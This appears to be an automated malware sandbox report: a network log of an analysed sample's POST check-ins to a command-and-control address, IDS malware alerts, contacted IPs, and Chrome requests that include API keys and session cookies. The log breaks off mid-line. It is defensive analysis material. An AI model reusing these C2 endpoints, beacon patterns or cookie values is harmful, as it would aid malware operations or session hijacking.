Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 44 31 43 31 39 38 42 37 38 44 35 32 39 37 37 32 37 44 42 45 35 30 30 33 38 30 39 46 33 46 33 38 31 35 30 30 34 39 39 41 30 46 34 35 31 32 34 41 38 39 38 41 33 46 33 38 42 33 46 39 41 45 41 42 41 38 35 38 36 33 42 42 38 44 41 36 44 44 37 45 32 37 41 38 42 38 31 32 34 41 34 44 41 31 32 31 35 35 41 38 45 43 37 39 33 35 32 31 39 39 31 32 43 45 42 37 39 38 44 39 36 33 41 30 30 44 32 34 30 34 45 32 39 35 31 33 46 42 31 37 34 44 45 45 37 39 45 36 31 45 30 30 41 42 Data Ascii: r=D1C198B78D5297727DBE5003809F3F381500499A0F45124A898A3F38B3F9AEABA85863BB8DA6DD7E27A8B8124A4DA12155A8EC7935219912CEB798D963A00D2404E29513FB174DEE79E61E00AB
Source: global traffic	HTTP traffic detected: POST /i2Fe32Z13/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 92.255.85.34Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View	IP Address: 151.101.1.91 151.101.1.91
Source: Joe Sandbox View	IP Address: 92.255.57.155 92.255.57.155
Source: Joe Sandbox View	IP Address: 92.255.57.155 92.255.57.155
Source: Joe Sandbox View	IP Address: 34.117.188.166 34.117.188.166

Source: Joe Sandbox View

JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49731 -> 92.255.57.155:80
Source: Network traffic	Suricata IDS: 2009207 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 5) : 192.168.2.8:57775 -> 185.208.37.90:3478

Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.34

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_0041C4F0 InternetCloseHandle,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep,

3_2_0041C4F0

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=ad&oit=1&cp=2&pgcl=7&gs_rn=42&psi=wsHD-GRSIp7vltWz&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2,es_dfp:de9dca5d HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddllog?async=doodle:365998795,slot:22,type:1,cta:0 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=adm&oit=1&cp=3&pgcl=7&gs_rn=42&psi=to7HRmLn1BxdAf9f&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=admi&oit=1&cp=4&pgcl=7&gs_rn=42&psi=to7HRmLn1BxdAf9f&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=admin&oit=1&cp=5&pgcl=7&gs_rn=42&psi=to7HRmLn1BxdAf9f&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=admin+&oit=1&cp=6&pgcl=7&gs_rn=42&psi=to7HRmLn1BxdAf9f&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=B4_8RXleWM64yncu6mT-fH5mzssMD6YYA1BE-29OaGQ1dQZWynPB2g1jz3RYRSvNcpX3OaoIXUMnxxbIbMxc6CV5Xw_f5dY1_AWhikSCQ2X8li3-Abl8M6rSZOj84MB8cSPeBZ0-rjz3dFhfm7XkH-vLYWOUh9l2otbnCEA1YNRKYIdLDJcSIDxOVBxN5H5_Aw
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=admin+b&oit=4&cp=7&pgcl=7&gs_rn=42&psi=to7HRmLn1BxdAf9f&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=B4_8RXleWM64yncu6mT-fH5mzssMD6YYA1BE-29OaGQ1dQZWynPB2g1jz3RYRSvNcpX3OaoIXUMnxxbIbMxc6CV5Xw_f5dY1_AWhikSCQ2X8li3-Abl8M6rSZOj84MB8cSPeBZ0-rjz3dFhfm7XkH-vLYWOUh9l2otbnCEA1YNRKYIdLDJcSIDxOVBxN5H5_Aw
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=admin+booki&oit=4&cp=11&pgcl=7&gs_rn=42&psi=to7HRmLn1BxdAf9f&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=X6a7Fd_rViGoracy4lw9TFj2_q3swNzQbnEln5X1S9ACFei8-s7O75cbieLoz5PM6T7FXPsabIxL4LO2EGD5Xwg7S_LYJY-gGaF70HoN2X8gA48tmMkF41NO5ixXg3nly-pSU5HMXolkz-zcP4qDe2Ctvuj9Ei6dgXxG1phQHIc5kT3qEcyknLtgl0d3FGkdM9ylvFDbCA
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=admin+bookin&oit=4&cp=12&pgcl=7&gs_rn=42&psi=to7HRmLn1BxdAf9f&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=X6a7Fd_rViGoracy4lw9TFj2_q3swNzQbnEln5X1S9ACFei8-s7O75cbieLoz5PM6T7FXPsabIxL4LO2EGD5Xwg7S_LYJY-gGaF70HoN2X8gA48tmMkF41NO5ixXg3nly-pSU5HMXolkz-zcP4qDe2Ctvuj9Ei6dgXxG1phQHIc5kT3qEcyknLtgl0d3FGkdM9ylvFDbCA
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=admin+bookinh&oit=4&cp=13&pgcl=7&gs_rn=42&psi=to7HRmLn1BxdAf9f&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 